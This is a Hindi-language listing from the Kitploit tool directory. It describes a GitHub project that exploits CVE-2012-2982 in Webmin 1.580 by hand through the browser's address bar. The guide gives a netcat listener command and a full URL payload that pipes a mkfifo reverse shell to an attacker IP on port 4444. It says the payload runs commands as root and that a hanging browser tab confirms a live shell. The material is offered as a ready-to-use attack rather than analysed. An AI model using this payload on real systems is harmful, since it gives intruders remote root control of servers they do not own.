Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — मैन्युअल, गैर-Metasploit प्रमाणित रिमोट कोड निष्पादन (RCE) शोषण ब्राउज़र URL बार के माध्यम से Webmin 1.580 (CVE-2012-2982) के लिए | Kitploit
उपकरण/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मैन्युअल, गैर-Metasploit प्रमाणित रिमोट कोड निष्पादन (RCE) शोषण ब्राउज़र URL बार के माध्यम से Webmin 1.580 (CVE-2012-2982) के लिए

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

Webmin 1.580 RCE निष्पादन मार्गदर्शिका

Webmin 1.580 पर /file/show.cgi घटक के माध्यम से प्रमाणित रिमोट कोड निष्पादन (RCE) निष्पादित करने के लिए त्वरित संदर्भ।


1. हमला मशीन (श्रोता)

पेलोड निष्पादित करने से पहले आने वाले कनेक्शन को पकड़ने के लिए अपनी स्थानीय मशीन पर यह कमांड चलाएँ:

root@kitploit:~
rlwrap nc -lnvp 4444

2. लक्ष्य शोषण पेलोड

निम्नलिखित URL को सीधे अपने ब्राउज़र के एड्रेस बार में चिपकाएँ (सुनिश्चित करें कि आप पहले से ही Webmin डैशबोर्ड में लॉग इन हैं):

root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Screenshot 2026-05-25 220641

नोट: <YOUR_ATTACK_IP> को अपने वास्तविक स्थानीय या टनल IP पते से बदलना याद रखें, साथ ही लक्ष्य का IP और PORT भी। Screenshot 2026-05-25 220708

संदर्भ और विवरण

कमजोरी: /file/show.cgi में Perl के आंतरिक open() फंक्शन को पास की गई इनलाइन पथ जानकारी का अपर्याप्त स्वच्छीकरण। पाइप कैरेक्टर (|) जोड़ने से रूट विशेषाधिकारों के साथ मनमाना कमांड निष्पादन की अनुमति मिलती है।

प्रमाणीकरण: इसके लिए एक सक्रिय सत्र की आवश्यकता होती है। जब आप URL पेलोड सबमिट करते हैं तो ब्राउज़र आपके सक्रिय सत्र कुकीज़ भेजकर स्वचालित रूप से प्रमाणीकरण संभालता है।

अपेक्षित व्यवहार: Enter दबाने के बाद, ब्राउज़र टैब घूमेगा और अनिश्चित काल के लिए लटका हुआ दिखाई देगा। यह पुष्टि करता है कि सर्वर थ्रेड को सफलतापूर्वक हाईजैक कर लिया गया है ताकि इंटरैक्टिव शेल सत्र बना रहे।

टूल डाउनलोड करें